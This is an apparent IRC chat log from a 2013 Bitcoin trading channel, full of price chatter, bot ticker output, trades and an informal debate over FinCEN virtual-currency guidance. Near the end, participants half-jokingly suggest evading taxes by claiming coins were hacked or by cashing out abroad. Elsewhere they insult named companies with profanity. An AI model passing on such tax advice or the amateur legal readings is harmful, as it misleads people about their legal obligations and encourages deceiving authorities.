Mar 19 00:08:43 37.90441 seconds Mar 19 00:09:03 Sub 10k wires have been arriving in 48 hours for me Mar 19 00:09:12 100k might take 2 weeks Mar 19 00:09:24 or 2 days Mar 19 00:10:15 you buying at these prices bug? Mar 19 00:10:57 no Mar 19 00:11:03 I have some coins there Mar 19 00:11:07 but I just want to get my Tesla Mar 19 00:11:09 :) Mar 19 00:11:15 nice Mar 19 00:11:16 I mean my fiat there Mar 19 00:11:18 haha he's buying a new juicer Mar 19 00:11:44 I think I'm holding the rest Mar 19 00:11:49 for a while Mar 19 00:12:12 No matter what happens now, I made at least 18x. Mar 19 00:12:30 Hopefully coins continue to rise Mar 19 00:12:33 18x is a good make to make. Mar 19 00:13:02 well i hope you started with a lot! Mar 19 00:13:03 Every 5-10 years there is an investment that is just so fucking obvious Mar 19 00:13:09 You gotta pull the trigger Mar 19 00:13:30 Bitcoins at $2, after being at $31, was a great example Mar 19 00:13:41 things always look obvious in retrospect ;) Mar 19 00:14:11 It seemed obvious then Mar 19 00:14:17 from a risk reward Mar 19 00:14:24 not obvious that it was going to 50 Mar 19 00:14:25 it did seem obvious. Mar 19 00:14:30 [MPEX] [S.MPOE] 7100 @ 0.000697 = 4.9487 BTC [-] Mar 19 00:14:53 but an EV analysis I drew up showed something like 5-10x EV Mar 19 00:15:03 which was clearly too conservative Mar 19 00:15:30 Sorta like F at $1. Mar 19 00:15:44 It wasn't obvious it would bounce to $15 Mar 19 00:15:47 i wouldn't call that one obvious ... Mar 19 00:15:50 [MPEX] [S.BBET] 5000 @ 0.0018 = 9 BTC [+] Mar 19 00:15:54 but EV was positive Mar 19 00:15:56 F? Mar 19 00:16:00 ford Mar 19 00:16:00 Ford Mar 19 00:16:05 da Mar 19 00:16:06 it's two competitors were bankrupt and under the government's control Mar 19 00:16:14 I did not pull the trigger there. Mar 19 00:16:30 maybe you know more about the car business than the average guy Mar 19 00:16:31 need a fan club passthrough for this https://bitcointalk.org/index.php?topic=147552.msg1566741#msg1566741 Mar 19 00:16:51 !ticker m s.bbet Mar 19 00:16:52 [MPEX:S.BBET] 1D: 0.0018 / 0.0018 / 0.0018 (17450 shares, 31.41 BTC), 7D: 0.0015 / 0.00189869 / 0.002014 (48750 shares, 92.56 BTC), 30D: 0.0015 / 0.00180983 / 0.002014 (135256 shares, 244.79 BTC) Mar 19 00:16:57 Friend of dad who had lost most of his money in the market did an EV analysis... Went all in with the rest of life savings Mar 19 00:17:04 made it all back. Mar 19 00:17:08 o srsly ? Mar 19 00:17:08 hail mary play Mar 19 00:17:17 cool! Mar 19 00:17:18 on F Mar 19 00:17:24 He sold at 4. Mar 19 00:17:26 heheheh Mar 19 00:17:33 oops Mar 19 00:17:40 o lol Mar 19 00:18:03 pigeons he has the right idea, borrow the bubble. Mar 19 00:18:04 dinnertime Mar 19 00:18:18 4x Mar 19 00:18:25 vs 18x Mar 19 00:18:28 enjoy you dinner! Mar 19 00:18:31 *r Mar 19 00:19:05 deadweasel: max(18x, 18x+n*x) where n =[0-1000] Mar 19 00:19:26 venturebeat : embattled-bitcoin-exchange-tradehill-is-back. matonis : Tradehill Launches As Bitcoin Exchange For Businesses And Accredited Investors Mar 19 00:19:33 i guess optimism is a wonderful gift. Mar 19 00:19:36 right, his was free Mar 19 00:21:17 [MPEX] [O.BTCUSD.P510T] 1 @ 0.12177158 BTC [-] Mar 19 00:21:18 mp in a bull market it is Mar 19 00:22:06 no no Chaang-Noi Mar 19 00:22:09 its 'irrational'. Mar 19 00:22:32 some times better to be lucky/crazy than smart Mar 19 00:23:49 Krugman and Bernanke have phd's lol Mar 19 00:23:59 wtf is a curation consultant Mar 19 00:24:37 no idea Mar 19 00:24:44 ;;bc,convert, eur Mar 19 00:24:45 Error: "bc,convert," is not a valid command. Mar 19 00:24:48 ;;bc,convert eur Mar 19 00:24:49 1 BTC = 49.49002 U.S. dollars = 38.169073 Euros Mar 19 00:24:50 smells like something a ycombinator company would have Mar 19 00:25:57 did we pop 50 or something? Mar 19 00:26:00 ;;ticker Mar 19 00:26:01 BTCUSD ticker | Best bid: 49.26107, Best ask: 49.49000, Bid-ask spread: 0.22893, Last trade: 49.26107, 24 hour volume: 45708.72214983, 24 hour low: 47.12009, 24 hour high: 49.79000, 24 hour vwap: 48.26314 Mar 19 00:26:16 ;;asks 50 Mar 19 00:26:17 There are currently 15875.704 bitcoins offered at or under 50.0 USD, worth 792726.780924 USD in total. | Data vintage: 117.4680 seconds Mar 19 00:26:18 bugpowder: http://www4c.wolframalpha.com/Calculate/MSP/MSP206621f5c2f1db8535a3000038g4ed53b9h0cdgd?MSPStoreType=image/gif&s=48&w=367.&h=57. Mar 19 00:27:08 $vwap ^oix Mar 19 00:27:09 smickles: 1 day: no data 7 day: average: 40.34905862 high: 57.74756063 low: 37.79100251 volume: 35646 btc: 4872.55462737 30 day: no data Mar 19 00:27:41 less than a million of soon to be fiat to go Mar 19 00:33:37 $markov Mar 19 00:33:37 but... i saw porn on there :( Mar 19 00:33:50 you bet Mar 19 00:35:34 $markov jurov Mar 19 00:35:34 jurov because a. its much easier to parse and b. because the bot Mar 19 00:36:05 $markov smickles Mar 19 00:36:06 smickles that film... you should totally watch it. Mar 19 00:36:25 $markov s.dice Mar 19 00:36:25 jurov: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:36:30 it'll get better with time Mar 19 00:36:41 $markov zhoutong Mar 19 00:36:41 pigeons: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:36:47 i hope for succinct prediction :/ Mar 19 00:36:57 deadweasel: ok..... Mar 19 00:36:59 $markov [MPEX:S.DICE] Mar 19 00:36:59 smickles: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:37:17 Bugpowder: yeah, no I have no idea at all Mar 19 00:37:17 $markov eskimobob Mar 19 00:37:18 jurov: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:37:22 $markov [MPEX] [S.DICE] Mar 19 00:37:22 smickles: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:37:26 bah Mar 19 00:37:26 i broke it Mar 19 00:38:15 $markov i hope Mar 19 00:38:15 smickles: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 19 00:38:24 D: Mar 19 00:38:51 [MPEX] [O.BTCUSD.C510T] 1 @ 0.06562237 BTC [-] Mar 19 00:39:17 ;;calc 51 - 1.065 Mar 19 00:39:18 49.935 Mar 19 00:39:28 er, wrong one Mar 19 00:39:41 ;;calc 51/(1-.065) Mar 19 00:39:41 54.5454545455 Mar 19 00:41:08 ;;estimate Mar 19 00:41:12 ;;ticker Mar 19 00:41:13 BTCUSD ticker | Best bid: 49.49999, Best ask: 49.50000, Bid-ask spread: 0.00001, Last trade: 49.49999, 24 hour volume: 47889.07477187, 24 hour low: 47.12009, 24 hour high: 49.79000, 24 hour vwap: 48.32588 Mar 19 00:41:20 Next difficulty estimate | 6247626.80304 based on data since last change | 6547204.92104 based on data for last three days Mar 19 00:41:28 [MPEX] [O.BTCUSD.C490T] 1 @ 0.08408666 BTC [-] Mar 19 00:41:29 [BTCTC] [GSDPT] 1 @ 0.00431 BTC [-] Mar 19 00:41:31 [BTCTC] [GSDPT] 20 @ 0.0043 = 0.086 BTC [-] Mar 19 00:41:34 [BTCTC] [GSDPT] 1 @ 0.00426 BTC [-] Mar 19 00:41:35 [BTCTC] [GSDPT] 9 @ 0.0041 = 0.0369 BTC [-] Mar 19 00:42:22 ;;calc 49/(1/.084) Mar 19 00:42:22 4.116 Mar 19 00:42:23 [BTCTC] [BASIC-MINING] 1 @ 0.334 BTC [-] Mar 19 00:42:24 [BTCTC] [BASIC-MINING] 1 @ 0.3337 BTC [-] Mar 19 00:42:26 [BTCTC] [BASIC-MINING] 1 @ 0.3332 BTC [-] Mar 19 00:42:27 ;;calc 49/(1-.084) Mar 19 00:42:28 53.4934497817 Mar 19 00:43:00 [MPEX] [S.MPOE] 4800 @ 0.000697 = 3.3456 BTC [-] Mar 19 00:43:59 ;;ticker Mar 19 00:44:00 BTCUSD ticker | Best bid: 49.50001, Best ask: 49.50002, Bid-ask spread: 0.00001, Last trade: 49.50002, 24 hour volume: 48101.89622656, 24 hour low: 47.12009, 24 hour high: 49.79000, 24 hour vwap: 48.33148 Mar 19 00:45:39 ;;bc,24hprc Mar 19 00:45:41 47.96 Mar 19 00:45:57 ;;calc [bc,24hprc]/[ticker --last] Mar 19 00:45:58 0.968888693154 Mar 19 00:47:22 at what point do we start seeing that 'buy/sell out mpoebot' trader Mar 19 00:47:44 [MPEX] [S.MPOE] 13443 @ 0.000697 = 9.3698 BTC [-] Mar 19 00:51:40 http://trilema.com/2013/steganography-or-the-simple-yet-strong-brain-wallet/ Mar 19 00:56:21 mircea_popescu: dammit man, stop publishing my ideas Mar 19 00:56:30 ;) Mar 19 00:56:50 hahaha Mar 19 00:56:52 strawberries smickles Mar 19 00:59:31 mircea_popescu: this is all getting into indiana jones territory. soon enough you'll have to be at 'the spot where the sun is at such an angel in sky on this day of the year and casts a shadow to your feet. turn left, take a pic of the mountian and pump that pic into the script where you enter "david duchovny" 6 times' Mar 19 00:59:48 absolutely. Mar 19 01:00:14 bitcoin is - among other things - bringing pirate maps back Mar 19 01:00:20 i loved those when i was 12 Mar 19 01:06:33 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 19 01:06:38 plot gets thinner Mar 19 01:07:04 (16:00) < mircea_popescu> bitcoin is - among other things - bringing pirate maps back << YES!! Mar 19 01:08:01 :D Mar 19 01:09:14 [MPEX] [S.MPOE] 10110 @ 0.00071781 = 7.2571 BTC [+] Mar 19 01:11:02 https://sites.google.com/site/buriedkeys/ Mar 19 01:13:42 ;;ticker Mar 19 01:13:44 BTCUSD ticker | Best bid: 49.71230, Best ask: 49.80000, Bid-ask spread: 0.08770, Last trade: 49.71230, 24 hour volume: 49314.22508067, 24 hour low: 47.12009, 24 hour high: 49.80000, 24 hour vwap: 48.37025 Mar 19 01:14:03 ;;asks 49.99 Mar 19 01:14:03 There are currently 1456.6221 bitcoins offered at or under 49.99 USD, worth 72734.4782962 USD in total. | Data vintage: 40.4732 seconds Mar 19 01:15:23 https://bitcointalk.org/index.php?topic=154518.msg1638361#msg1638361 Mar 19 01:15:24 ouch Mar 19 01:16:53 that's neat pigeons Mar 19 01:18:00 ;;ticker Mar 19 01:18:07 ;;asks 49.99 Mar 19 01:18:08 BTCUSD ticker | Best bid: 49.71230, Best ask: 49.80000, Bid-ask spread: 0.08770, Last trade: 49.71230, 24 hour volume: 49314.22508067, 24 hour low: 47.12009, 24 hour high: 49.80000, 24 hour vwap: 48.37025 Mar 19 01:18:09 There are currently 384.75233 bitcoins offered at or under 49.99 USD, worth 19225.9672632 USD in total. | Data vintage: 0.3233 seconds Mar 19 01:18:26 ;;goxlag Mar 19 01:18:27 5.363153 seconds Mar 19 01:18:33 49.95 Mar 19 01:18:51 .97 Mar 19 01:18:52 .98 Mar 19 01:18:55 .99 Mar 19 01:19:05 50 Mar 19 01:19:25 ;;ticker Mar 19 01:19:26 BTCUSD ticker | Best bid: 49.55001, Best ask: 49.71229, Bid-ask spread: 0.16228, Last trade: 49.55001, 24 hour volume: 51864.42162892, 24 hour low: 47.12009, 24 hour high: 49.94900, 24 hour vwap: 48.43539 Mar 19 01:19:46 ;;ticker Mar 19 01:19:47 BTCUSD ticker | Best bid: 49.55001, Best ask: 49.71229, Bid-ask spread: 0.16228, Last trade: 49.55001, 24 hour volume: 51864.42162892, 24 hour low: 47.12009, 24 hour high: 49.94900, 24 hour vwap: 48.43539 Mar 19 01:20:00 saw 50 on coinlab ticker Mar 19 01:20:24 ;;ticker Mar 19 01:20:24 ;;ticker Mar 19 01:20:29 BTCUSD ticker | Best bid: 49.55001, Best ask: 49.71229, Bid-ask spread: 0.16228, Last trade: 49.55001, 24 hour volume: 51864.42162892, 24 hour low: 47.12009, 24 hour high: 49.94900, 24 hour vwap: 48.43539 Mar 19 01:20:29 fancy wallstreet prices Mar 19 01:20:29 BTCUSD ticker | Best bid: 49.55001, Best ask: 49.71229, Bid-ask spread: 0.16228, Last trade: 49.55001, 24 hour volume: 51864.42162892, 24 hour low: 47.12009, 24 hour high: 49.94900, 24 hour vwap: 48.43539 Mar 19 01:20:35 :D Mar 19 01:20:36 [MPEX] [O.BTCUSD.C470T] 1 @ 0.10841351 BTC [-] Mar 19 01:20:42 says 50 on goxlive Mar 19 01:20:54 ;;calc 1/(1-.1084) Mar 19 01:20:55 1.12157918349 Mar 19 01:20:55 ;;goxlag Mar 19 01:20:57 46.263792 seconds Mar 19 01:21:03 ;;calc 47/(1-.1084) Mar 19 01:21:03 52.714221624 Mar 19 01:22:51 was the solution for sdice to split off transactions into entire blocks? Mar 19 01:23:17 that's what it looks like on https://blockchain.info/ Mar 19 01:23:35 ;;ticker Mar 19 01:23:36 BTCUSD ticker | Best bid: 49.55001, Best ask: 49.71229, Bid-ask spread: 0.16228, Last trade: 49.55001, 24 hour volume: 51864.42162892, 24 hour low: 47.12009, 24 hour high: 49.94900, 24 hour vwap: 48.43539 Mar 19 01:25:14 [MPEX] [O.BTCUSD.C450T] 1 @ 0.13772223 BTC [+] Mar 19 01:26:06 ;;ticker Mar 19 01:26:09 BTCUSD ticker | Best bid: 49.78232, Best ask: 49.98998, Bid-ask spread: 0.20766, Last trade: 49.71229, 24 hour volume: 54635.61117328, 24 hour low: 47.12009, 24 hour high: 50.00000, 24 hour vwap: 48.51496 Mar 19 01:26:10 50.01 Mar 19 01:26:20 :) Mar 19 01:27:06 it almost feels like classical conditioning Mar 19 01:27:11 these waves in prices Mar 19 01:27:29 [MPEX] [S.MPOE] 4960 @ 0.0007453 = 3.6967 BTC [+] Mar 19 01:27:36 Poppin bottles! Mar 19 01:27:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 19 01:28:03 ;;ticker Mar 19 01:28:08 BTCUSD ticker | Best bid: 49.78232, Best ask: 49.98998, Bid-ask spread: 0.20766, Last trade: 49.71229, 24 hour volume: 54635.61117328, 24 hour low: 47.12009, 24 hour high: 50.00000, 24 hour vwap: 48.51496 Mar 19 01:28:58 wat? Mar 19 01:29:05 I'm seeing 50.05 Mar 19 01:29:22 market manipulation! Mar 19 01:29:28 gribble iz slow Mar 19 01:29:30 [MPEX] [O.BTCUSD.P430T] 8 @ 0.0441449 = 0.3532 BTC [-] Mar 19 01:30:00 I assume there is some panic buying goxlag Mar 19 01:30:07 bitcoin charts has it at 50.20 Mar 19 01:30:20 ;;goxlag Mar 19 01:30:21 44.343507 seconds Mar 19 01:30:33 [BTCTC] [ASICMINER-PT] 1 @ 0.8402 BTC [-] Mar 19 01:30:35 [BTCTC] [ASICMINER-PT] 4 @ 0.8401 = 3.3604 BTC [-] Mar 19 01:30:37 [BTCTC] [ASICMINER-PT] 6 @ 0.84 = 5.04 BTC [-] Mar 19 01:30:37 ;;ticker Mar 19 01:30:39 BTCUSD ticker | Best bid: 49.78232, Best ask: 49.98998, Bid-ask spread: 0.20766, Last trade: 49.71229, 24 hour volume: 54635.61117328, 24 hour low: 47.12009, 24 hour high: 50.00000, 24 hour vwap: 48.51496 Mar 19 01:30:51 heh... that is STALE Mar 19 01:32:43 [MPEX] [O.BTCUSD.C510T] 250 @ 0.10675 = 26.6875 BTC [+] Mar 19 01:32:45 [MPEX] [O.BTCUSD.C510T] 750 @ 0.10948345 = 82.1126 BTC [+] Mar 19 01:33:22 [MPEX] [O.BTCUSD.C510T] 250 @ 0.10948345 = 27.3709 BTC [+] Mar 19 01:33:30 ;;goxlag Mar 19 01:33:30 0.360978 seconds Mar 19 01:34:03 ;;cakc ;;goxlag/3600 Mar 19 01:34:04 Error: "cakc" is not a valid command. Mar 19 01:34:07 for more convinient format Mar 19 01:34:25 cakc right. Mar 19 01:34:41 [MPEX] [O.BTCUSD.C490T] 500 @ 0.12927863 = 64.6393 BTC [+] Mar 19 01:35:52 meow Mar 19 01:35:55 ;;ticker Mar 19 01:35:56 BTCUSD ticker | Best bid: 51.00001, Best ask: 51.01000, Bid-ask spread: 0.00999, Last trade: 51.00000, 24 hour volume: 59546.54465887, 24 hour low: 47.12009, 24 hour high: 51.01000, 24 hour vwap: 48.67395 Mar 19 01:36:03 *yawn Mar 19 01:36:17 $51? zomg Mar 19 01:36:29 [MPEX] [O.BTCUSD.C410T] 4 @ 0.23958397 = 0.9583 BTC [+] Mar 19 01:36:44 lol! Mar 19 01:36:52 this is le excitingque Mar 19 01:36:56 well, cyprus Mar 19 01:36:57 lol Mar 19 01:37:06 in anything, TA is bullshit Mar 19 01:37:14 mp go pay bitbet nao~! Mar 19 01:37:15 it almost feels like classical conditioning0 Mar 19 01:37:19 lol Mar 19 01:37:20 oops jk Mar 19 01:37:23 i have been saying this for a while now, the more world goes to shit, the better for btc Mar 19 01:37:24 fundamentals beats all! Mar 19 01:37:36 we are the new wealthy elite Mar 19 01:38:20 im just gonna sit this out, waiting for my avalon Mar 19 01:38:31 we just rboke 52 Mar 19 01:38:42 nowai ?! Mar 19 01:38:43 ;;ticker Mar 19 01:38:44 BTCUSD ticker | Best bid: 52.00000, Best ask: 52.12000, Bid-ask spread: 0.12000, Last trade: 52.00000, 24 hour volume: 61002.40967740, 24 hour low: 47.12009, 24 hour high: 52.12000, 24 hour vwap: 48.74625 Mar 19 01:38:52 this is going to 100 Mar 19 01:39:03 ;;goxlag Mar 19 01:39:04 2.173409 seconds Mar 19 01:39:12 WE NEED MOAR LAG!!! Mar 19 01:39:18 just watch the price here Mar 19 01:39:21 in real time Mar 19 01:39:21 http://coinlab.com/ Mar 19 01:39:26 lol Mar 19 01:39:27 the orderbook is skewed Mar 19 01:39:30 not enough coins Mar 19 01:39:32 so the big 50 wall was a fake Mar 19 01:39:45 was it fake or eaten Mar 19 01:39:52 dunno Mar 19 01:39:56 it was take out in 2 steps today Mar 19 01:39:59 taken Mar 19 01:40:01 part eaten taken off Mar 19 01:40:09 you shouldn't eat so much, kakobrekla Mar 19 01:40:13 on nm Mar 19 01:40:13 some people seem to be dumping Mar 19 01:40:14 lol Mar 19 01:40:20 deadweasel im full :p Mar 19 01:40:27 of bitcoins Mar 19 01:40:42 wow Mar 19 01:40:46 i welcome you, my cyprus and spanish friends Mar 19 01:40:47 worth 50+ Mar 19 01:40:49 52 Mar 19 01:40:55 i'm 1/4 spanish Mar 19 01:41:20 52.12! no way this holds Mar 19 01:41:29 meanwhile in antartica: ltc down to 0.01 Mar 19 01:41:35 panic selling t-minus some seconds Mar 19 01:42:09 nah dude Mar 19 01:42:12 this is moving up Mar 19 01:42:20 fuck this shit im cancelling LTC Mar 19 01:42:27 oh bowjob Mar 19 01:42:29 trading your emotions Mar 19 01:42:30 that's cute Mar 19 01:42:42 ;;ticker Mar 19 01:42:44 BTCUSD ticker | Best bid: 52.10000, Best ask: 52.11999, Bid-ask spread: 0.01999, Last trade: 52.10000, 24 hour volume: 61104.42476205, 24 hour low: 47.12009, 24 hour high: 52.12000, 24 hour vwap: 48.75342 Mar 19 01:44:15 http://polimedia.us/dtng/c/src/136365020251.png Mar 19 01:44:18 for the win Mar 19 01:44:32 [MPEX] [S.MPOE] 11300 @ 0.00075127 = 8.4894 BTC [+] Mar 19 01:44:32 ;;bids 50 Mar 19 01:44:33 There are currently 6286.4465 bitcoins demanded at or over 50.0 USD, worth 315601.470911 USD in total. | Data vintage: 44.1438 seconds Mar 19 01:44:33 [MPEX] [S.MPOE] 1487 @ 0.00076717 = 1.1408 BTC [+] Mar 19 01:44:41 ;;bids 49 Mar 19 01:44:43 There are currently 7952.6316 bitcoins demanded at or over 49.0 USD, worth 397741.218334 USD in total. | Data vintage: 53.4991 seconds Mar 19 01:44:48 not a bad wall Mar 19 01:46:15 ;;ticker --last Mar 19 01:46:16 52.10000 Mar 19 01:47:04 ;;goxlag Mar 19 01:47:05 54.463538 seconds Mar 19 01:47:12 ho ho ho Mar 19 01:47:48 merry lag time Mar 19 01:48:15 “We want to be the grownups in the Bitcoin space,” said chief operating officer Ryan Singer in an interview. Mar 19 01:48:15 Read more at http://venturebeat.com/2013/03/18/embattled-bitcoin-exchange-tradehill-is-back/#kOC57bZHlphBM98A.99 Mar 19 01:48:20 ahaha fuckwits. Mar 19 01:48:41 californians, man Mar 19 01:48:57 second only to new yorkers in arrogant fuckery Mar 19 01:48:57 fucking tradition in bitcoin, retards posturing as ":the adults:" Mar 19 01:49:10 bitcoinica consultancy ? check. Mar 19 01:49:15 coinfail ? check Mar 19 01:49:19 tradehill ? check. Mar 19 01:49:34 next kludge is going to come back from the dead wanting to be the adult in bitcoin or some shit. Mar 19 01:49:41 maybe bruce wagner too. Mar 19 01:50:27 it's how you raise capital Mar 19 01:50:29 yawn Mar 19 01:50:37 pretend to be awesome Mar 19 01:50:39 hustle ferociously Mar 19 01:50:44 disregard the truth Mar 19 01:50:52 im not concered Mar 19 01:50:56 they are in merrica Mar 19 01:50:59 they will get selffucked Mar 19 01:51:01 what the fuck is up with their photos Mar 19 01:51:06 so unprofessional Mar 19 01:51:09 i don't understand the fixation with exchanges. Mar 19 01:51:13 I see they swapped out the original Mar 19 01:51:21 which was them looking hammered, holding a drink Mar 19 01:51:29 benkay it's like the notion that bitcoi nwill grow through retail adoption Mar 19 01:51:35 people focus on what they can understand easily. Mar 19 01:51:53 derp harder, oh my countrymen Mar 19 01:51:54 Bugpowder shh, adult photos! Mar 19 01:52:05 like WTF Mar 19 01:52:21 ;;ticker Mar 19 01:52:23 BTCUSD ticker | Best bid: 51.73600, Best ask: 51.93701, Bid-ask spread: 0.20101, Last trade: 51.73801, 24 hour volume: 64139.42338876, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 48.93122 Mar 19 01:52:27 wear a fucking suit for your fucking presentation to the world dipshits Mar 19 01:52:27 53 about to gho Mar 19 01:52:53 Bugpowder the only thing the rental store had was a pink tux and a strapless sperm-white gucci dress Mar 19 01:53:05 well... guggi. Mar 19 01:53:24 huh.. http://www.fincen.gov/statutes_regs/guidance/html/FIN-2013-G001.html Mar 19 01:54:08 FinCEN's statement on applicability of regulations to virtual currencies, posted today Mar 19 01:54:14 anyone singed up for that prime idiotism? Mar 19 01:54:31 where did you find that, parseval? Mar 19 01:54:34 parseval o hery, big deal. Mar 19 01:54:42 It was on reddit Mar 19 01:55:01 This guidance refers to the participants in generic virtual currency arrangements, using the terms "user," "exchanger," and "administrator."6 A user is a person that obtains virtual currency to purchase goods or services.7 An exchanger is a person engaged as a business in the exchange of virtual currency for real currency, funds, or other virtual currency. An administrator is a person engaged as a business in issuing ( Mar 19 01:55:01 putting into circulation) a virtual currency, and who has the authority to redeem (to withdraw from circulation) such virtual currency. Mar 19 01:55:03 they blew it. Mar 19 01:55:09 mpex still extempt. Mar 19 01:55:51 See part C Mar 19 01:55:53 A final type of convertible virtual currency activity involves a de-centralized convertible virtual currency (1) that has no central repository and no single administrator, and (2) that persons may obtain by their own computing or manufacturing effort. Mar 19 01:55:53 A person that creates units of this convertible virtual currency and uses it to purchase real or virtual goods and services is a user of the convertible virtual currency and not subject to regulation as a money transmitter. By contrast, a person that creates units of convertible virtual currency and sells those units to another person for real currency or its equivalent is engaged in transmission to another location Mar 19 01:55:53 and is a money transmitter. In addition, a person is an exchanger and a money transmitter if the person accepts such de-centralized convertible virtual currency from one person and transmits it to another person as part of the acceptance and transfer of currency, funds, or other value that substitutes for currency. Mar 19 01:56:24 nope. Mar 19 01:56:48 to be an administrator it substantively requires you have the ability to withdraw units. Mar 19 01:56:54 Looks like MtGox is getting out just in time Mar 19 01:57:12 to be a transmitter it substantively requires you blabla as part of acceptance/transfer of funds/currency/etc. Mar 19 01:57:17 but yes. Mar 19 01:57:22 we can reach $58 if Mar 19 01:57:26 pretty much all exchanges have an issue nao. Mar 19 01:57:28 theres $500k Mar 19 01:57:28 damn Mar 19 01:57:29 hahaha' Mar 19 01:57:42 You have to follow the BSA as a transmitter Mar 19 01:58:08 Which means all sorts of recordkeeping and reporting regulations Mar 19 01:58:29 looks like they are trying to say anyone who buys or sells bitcoin for fiat is a money transmitter Mar 19 01:58:38 so all users of any exchange Mar 19 01:58:55 A person must exchange the currency of two or more countries to be considered a dealer in foreign exchange.19 Virtual currency does not meet the criteria to be considered "currency" under the BSA, because it is not legal tender. Therefore, a person who accepts real currency in exchange for virtual currency, or vice versa, is not a dealer in foreign exchange under FinCEN's regulations. Mar 19 01:58:59 this is pretty good. Mar 19 01:59:18 Oh, nice, I missed that part Mar 19 01:59:24 not foex, but money tx Mar 19 02:00:04 pretty good point Mar 19 02:00:26 so in the end, fincen guidance supports at least in part http://trilema.com/2012/the-reasons-why-bitcoin-securities-cant-be-regulated-by-the-sec/ Mar 19 02:00:45 kinda nice to have them come out with "it is not a currency" statement. Mar 19 02:01:11 they class it the same as wow gold here Mar 19 02:01:31 BitHub: if you buy wow gold you're a money transmitter? Mar 19 02:01:38 i dun think so Mar 19 02:01:58 that doc says if you buy a decentralized virtual currency, you are a money transmitter Mar 19 02:02:19 which has a whole shebang of regulation Mar 19 02:02:31 I think it's just if you sell it Mar 19 02:02:42 i think it said both Mar 19 02:02:46 im just sitting here fapping getting rich Mar 19 02:02:48 >_> Mar 19 02:02:59 WOW Mar 19 02:03:04 i ougtta work or something. this feels cheating Mar 19 02:03:05 lol Mar 19 02:03:05 coinbase just took my txn. given their history that doesn't mean anything. Mar 19 02:03:18 That FinCEN thing looks interesting Mar 19 02:03:18 work at like mcdicks. make more money than the manager Mar 19 02:03:19 haha Mar 19 02:03:22 Bugpowder indeed. Mar 19 02:03:27 I will get feedback from wifey Mar 19 02:03:37 and from my other lawyer friends Mar 19 02:03:48 Bugpowder cool Mar 19 02:04:14 i might actually have to pay federal income tax this coming year if this shit keeps up Mar 19 02:04:39 lol smickles Mar 19 02:04:55 fuck those guys, this is bartering Mar 19 02:04:57 cant you just hide your coins and tell them you got hacked? Mar 19 02:05:01 lmao Mar 19 02:05:09 deadweasel: not when you trade it for usd Mar 19 02:05:15 why do that? Mar 19 02:05:19 just buy *things* Mar 19 02:05:20 fuck usd Mar 19 02:05:24 cash out in another country Mar 19 02:05:44 why are you folks so hell bent on not paying tax ? Mar 19 02:05:49 it's all part of the plan Mar 19 02:05:50 Or buy USD on an auction house Mar 19 02:05:56 Have them mail it to you Mar 19 02:06:01 mircea_popescu: i'm not, it's just that i'm poor and haven't done it yet Mar 19 02:06:03 I mean actual cash Mar 19 02:06:07 smickles not you, them Mar 19 02:06:36 also, they gave me ~4kusd for my kid this year Mar 19 02:06:42 because 51%+ goes to something worse than churches Mar 19 02:06:44 right mircea because MPEX is paying coporate tax right? Mar 19 02:06:54 it goes to war. Mar 19 02:07:03 so fuck em Mar 19 02:07:06 BitHub on fiat revenue, sure. Mar 19 02:07:29 right so if everything is in btc why pay tax? Mar 19 02:07:36 i got hacked and all my coins are gone Mar 19 02:07:45 lol ok. Mar 19 02:07:46 if stuff like the fincen doc keep popping up, bitcoin 'revenue' isn't revenue Mar 19 02:08:03 smickles it quite clearly says it isn't actually Mar 19 02:08:06 bartering tokens are still taxable Mar 19 02:08:11 get that guide Mar 19 02:08:19 of course, it wouldn't be the first time this here bird is considered a duck for the purpose of X law and a goose for the purpose of y law Mar 19 02:08:24 even if it can't be both. Mar 19 02:08:40 isn't your juridiction cyberspace? Mar 19 02:08:55 BitHub practically or theoretically ? Mar 19 02:09:03 Bugpowder: but it's taxed in a whole different way if you barter with it Mar 19 02:09:06 prac Mar 19 02:09:21 practically it's romania. Mar 19 02:10:05 that's right, mircea_popescu is an umpyr Mar 19 02:10:49 ;;ticker Mar 19 02:10:50 BTCUSD ticker | Best bid: 50.83101, Best ask: 51.11538, Bid-ask spread: 0.28437, Last trade: 51.29899, 24 hour volume: 66200.90710021, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.02600 Mar 19 02:11:10 we're crashing! Mar 19 02:11:46 haha flash crash Mar 19 02:11:56 ;;ticker Mar 19 02:11:56 1M btc block: https://blockchain.info/block-index/361547/000000000000036a89470665c290a5aeead5809c2dc5fcb58678598e64211bc0 Mar 19 02:11:57 BTCUSD ticker | Best bid: 50.83101, Best ask: 51.11538, Bid-ask spread: 0.28437, Last trade: 51.29899, 24 hour volume: 66200.90710021, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.02600 Mar 19 02:11:57 wall at 54 Mar 19 02:12:01 ;;asks 54 Mar 19 02:12:13 There are currently 14319.578 bitcoins offered at or under 54.0 USD, worth 768614.569271 USD in total. | Data vintage: 150.8870 seconds Mar 19 02:12:44 -25 BTC transaction fee? Mar 19 02:13:41 Data vintage: 150.8870 seconds lmao Mar 19 02:13:43 Bugpowder hm ? Mar 19 02:13:58 Bugpowder: yeah thought that was weird Mar 19 02:14:00 When it comes to Tax why give money to a useless middleman that does a pretty terrible job at making the best of your money to make a better country, actually just waste alot, there's no point paying them when i can just hire people to make the country a lil bit less shit. Mar 19 02:14:31 i like to build parks, and roads, and speedhumps Mar 19 02:14:34 wtf is that block Mar 19 02:14:37 1mn btc transacted ?! Mar 19 02:14:56 i just cashed out, that was me.... Mar 19 02:15:01 lets look deeepr Mar 19 02:15:05 :) Mar 19 02:15:28 ;;goxlag Mar 19 02:15:30 95.434838 seconds Mar 19 02:15:32 ha Mar 19 02:15:34 SMOKES. Mar 19 02:15:47 something like deepbit payments or something Mar 19 02:15:57 ;;ticker Mar 19 02:15:58 BTCUSD ticker | Best bid: 50.83101, Best ask: 51.11538, Bid-ask spread: 0.28437, Last trade: 51.29899, 24 hour volume: 66200.90710021, 24 hour low: 47.12009, 